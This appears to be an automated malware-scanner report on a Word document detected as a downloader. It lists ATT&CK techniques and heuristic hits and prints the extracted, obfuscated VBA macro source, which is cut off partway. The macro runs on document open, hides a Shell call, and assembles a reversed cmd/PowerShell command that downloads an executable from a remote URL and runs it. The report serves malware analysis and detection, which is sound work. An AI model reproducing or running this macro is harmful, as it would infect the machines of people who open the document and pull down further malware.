MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Downloader.Valyria-6922883-0' further suggests a downloader functionality. The reconstructed command 'cmd /V/c set B^5^z=^ ^ ^ ^ ^ }};^k^a^e{h t a } ; k a e' is part of the obfuscated script, likely preparing to download and execute a secondary payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Valyria-6922883-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6922883-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5441 bytes |
SHA-256: b2cdcf717ee4a3cda860e177e412ff407fec2f0b14084cd2da76af580878fc4f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kMmKwniljVlPK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month Format("3020" + "3818" + "508600536" + "pi")
Month Format("351232743" + "jDzlsUhQzbvmi" + "qZFFv" + "495106892")
Month Format("8780" + "402608255")
Month Format("zXjoUSrUo" + "501962482")
Month Format("1766" + "jJL" + "vNpZIDqD" + "Bj")
Shell Format(AOdTBA) + Format(svmbpVdjjws) + Format(fMzHTNFhk) + fZITY + DRduOYpzGM + Format(ouHWoiSpoPOF) + Format(dYfnvfSrrLQuG), Format(vbHide)
Month Format("nnG" + "h" + "u" + "K")
Month Format("1215" + "w" + "1499" + "t")
Month Format("WFZaLC" + "zaw" + "sQ" + "U")
End Sub
Attribute VB_Name = "dBbIwqqiXVSOJM"
Function fZITY()
On _
Error _
Resume _
Next
Month Format("7710" + "vwzszTBhm" + "OphU" + "pE")
Month Format("Sjvvpb" + "PX")
Month Format("224786749" + "rEL" + "6487" + "391709149")
znBQVn = Chr(12 + 5 + 2 + 17 + 63) + "md" + " /V/" + Chr(8 + 3 + 1 + 12 + 43) + Chr(4 + 1 + 0 + 5 + 24) + "^" + "s^" + "et B" + "^" + "5" + "^z" + "=^ ^ " + " ^ ^" + " ^ " + "^ "
Month Format("jBj" + "FF" + "IRQEItRSvdtRKz" + "wA")
Month Format("467336188" + "wnBMEuNbi")
Month Format("880" + "206604558" + "OJwb" + "MzZcMNXl")
Month Format("qOzc" + "449540882")
RlvEA = "^ ^ ^ " + "^" + " ^ ^}}" + "{" + "^h" + Chr(12 + 5 + 2 + 17 + 63) + "^t" + "^a" + Chr(12 + 5 + 2 + 17 + 63) + "^}^" + ";^k^a^e"
Month Format("BHAjFvY" + "rP" + "VZbzU" + "CuQfLsBT")
Month Format("L" + "524169272" + "jYFic" + "PYmh")
Month Format("YVjZzciokuVt" + "EEniISoUzu")
Month Format("510735391" + "jP")
FQUHTV = "r^b" + "^;^mf^" + "T$^ m" + "^et^" + "I-"
Month Format("103015912" + "356515384" + "o" + "7219")
jhlCGj = "^e^" + "k^ovn^" + "I;)" + "mfT$" + " ^,m" + Chr(12 + 5 + 2 + 17 + 63) + "U" + "$(e"
Month Format("102" + "233212008" + "4057" + "9131")
Month Format("rQ" + "75908295" + "8369" + "dEcU")
wVDZMXm = "^li" + "^F^d" + "^" + "a^o^ln^" + "woD^."
Month Format("PMiH" + "rUfjZ")
Month Format("NStzLkVQiUND" + "PzPZdSdndziI")
Month Format("516312612" + "U" + "nHFi" + "201278729")
GbYFcQbaiHd = "pK^u^${" + "yr^t^{)" + Chr(8 + 3 + 1 + 12 + 43) + "^G^G^" + "$^ ni^ " + "m" + Chr(12 + 5 + 2 + 17 + 63) + "U" + "^$" + "(^h" + Chr(12 + 5 + 2 + 17 + 63) + "a^er^o"
Month Format("5058" + "3482")
Month Format("2232" + "FMuK")
KGjjE = "^f;" + "'e" + "x^e." + "'+" + Chr(8 + 3 + 1 + 12 + 43) + "^An" + "$+^'\" + "^'^+" + Chr(12 + 5 + 2 + 17 + 63) + "^i"
Month Format("L" + "MshAhdpVCm" + "zCOZPuw" + "z")
Month Format("wL" + "V")
Month Format("479412543" + "TPqdPGDvNz" + "VkPq" + "174585882")
Month Format("7398" + "w" + "GJAnzihRv" + "Kq")
CiFVEfEzVz = "^" + "lbup^:v" + "ne" + "$^=^mf" + "T$;^'^" + "8^7"
Month Format("128235619" + "f")
Month Format("19181976" + "OiE")
jHcJl = "8'^ ^=" + " " + Chr(8 + 3 + 1 + 12 + 43) + "^An^$" + ";)^'^@" + "'(ti^l" + "pS^." + "'n^" + "kt^.^" + "9^k" + "n^bk^=" + "^l"
Month Format("XF" + "7239")
Month Format("qvvdvOfDb" + "5312")
Month Format("22692766" + "zRJB" + "vzcTil" + "zi")
Month Format("115582837" + "2978" + "dppqzr" + "zkFXwwBh")
uofiwPF = "?p^hp^." + "t^o" + "ksnap^o" + "/" + "T^TR/^" + "mo" + Chr(12 + 5 + 2 + 17 + 63) + ".f^h" + "bv^o8" + "y^" + "6r" + "^pyv^1^"
fZITY = znBQVn + RlvEA + FQUHTV + jhlCGj + wVDZMXm + GbYFcQbaiHd + KGjjE + CiFVEfEzVz + jHcJl + uofiwPF
Month Format("i" + "bTzwbO" + "GjW" + "Zn")
Month Format("4984" + "HJkG" + "zkmF" + "AZUndol")
Month Format("FtasPwzzv" + "huzklmF")
End Function
Function DRduOYpzGM()
On _
Error _
Resume _
Next
Month Format("qlJ" + "jzfZ")
jlfAbzGZTf = "h" + "//^:p^t" + "th^'^=" + Chr(8 + 3 + 1 + 12 + 43) + "^G^G^$" + ";^tn^" + "e" + "il" + Chr(8 + 3 + 1 + 12 + 43) + "be" + "^W"
Month Format("459902627" + "DXtU" + "73188835" + "467571472")
Mo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.